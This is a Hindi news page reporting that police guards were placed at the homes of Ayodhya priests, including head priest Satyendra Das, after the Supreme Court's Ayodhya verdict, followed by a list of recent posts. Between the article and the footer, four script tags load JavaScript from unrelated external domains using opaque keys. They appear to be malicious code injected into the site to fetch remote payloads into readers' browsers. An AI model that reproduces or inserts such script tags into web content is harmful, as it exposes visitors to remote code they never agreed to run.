Categories: इंडिया

अयोध्या फैसले के बाद संतों की सुरक्षा बढ़ी, रामलला के मुख्य महंत के घर पुलिस तैनात

<p>राम जन्मभूमि-बाबरी मस्जिद विवाद मामले फैसला आने के बाद देश में सुरक्षा के मद्देनजर काफी एहतियात बरते जा रहे हैं। खासतौर पर उत्तर प्रदेश में पुलिस पूरी तरह से मुस्तैद है। फैसला आने के एक दिन बाद रामलला के मुख्य पुजारी सत्येंद्र दास के घर की सुरक्षा को बढ़ा दिया गया है। महंत सत्येंद्र दास के घर के बाहर दर्जनभर से अधिक पुलिसकर्मियों को तैनात किया गया है। सिर्फ उनकी नहीं बल्कि अयोध्या में अन्य प्रमुख संतों की सुरक्षा में बढ़ोतरी की गई है।</p>

<p>बता दें कि शनिवार को सुप्रीम कोर्ट ने अयोध्या मामले में फैसला सुनाया। सुप्रीम कोर्ट ने रामजन्मभूमि-बाबरी मस्जिद विवाद में विवादित स्थल को रामलला विराजमान को देने का फैसला किया है, वहीं मुस्लिम पक्ष को अयोध्या में ही 5 एकड़ ज़मीन देने की बात कही गई है। फैसला आने से पहले भी अयोध्या समेत उत्तर प्रदेश के कई शहरों में सुरक्षा को बढ़ा दिया गया था। हर चौक-चौराहे पर पुलिसवाले तैनात थे, इसके अलावा देश के कई शहरों में एहतियात के तौर पर इंटरनेट की सुविधा को बंद कर दिया गया था। उत्तर प्रदेश में भी कुछ ऐसे ही हालात थे, हर वक्त सोशल मीडिया पर नज़र रखी जा रही थी। जो भी सोशल मीडिया पर भड़काऊ पोस्ट लिख रहा था, उसे तुरंत चेतावनी दी जा रही थी, कुछ मामलों में तो FIR भी दर्ज की गई है।</p>
<script src=”//amptylogick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1573372799110″ type=”text/javascript”></script>
<script src=”http://amptylogick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

नालागढ़ के आजाद विधायक का नया नाम ‘केएल बिके’: मुख्यमंत्री

नालागढ़ के आजाद विधायक का नया नाम 'केएल बिके': मुख्यमंत्री भाजपा को जनता की अदालत…

3 hours ago

21518 सैन्य जवानों को ई-ट्रांसमिशन से मिलेंगे पोस्टल बैलेट: DC

कांगड़ा संसदीय क्षेत्र में 21518 सैन्य जवानों को ई-ट्रांसमिटिड पोस्टल बैलेट पेपर भेजे जाएंगे ताकि…

3 hours ago

दर्जी के पास ही पड़ा रहेगा जयराम का नया काला कोट, दिन में सपने देखना छोड़ें: CM

दर्जी के पास ही पड़ा रहेगा जयराम का नया काला कोट, दिन में सपने देखना…

3 hours ago

राज्यपाल ने किया कला प्रदर्शनी का शुभारम्भ

राज्यपाल शिव प्रताप शुक्ल ने भारतीय कला परिषद् द्वारा शिमला के ऐतिहासिक गेयटी थियेटर में…

3 hours ago

लोकसभा, विस उपचुनाव की ईवीएम और वीवीपैट की हुई दूसरी रेंडजमाईजेशन

कांगड़ा-चंबा संसदीय क्षेत्र तथा धर्मशाला विस उपचुनाव के लिए ईवीएम और वीवीपैट मशीनों की दूसरी…

4 hours ago

48919 आवेदनों में से अब तक 37362 प्रपत्र स्वीकृत: मनीष गर्ग

मुख्य निर्वाचन अधिकारी मनीष गर्ग ने आज यहां जानकारी दी कि 85 वर्ष से अधिक…

4 hours ago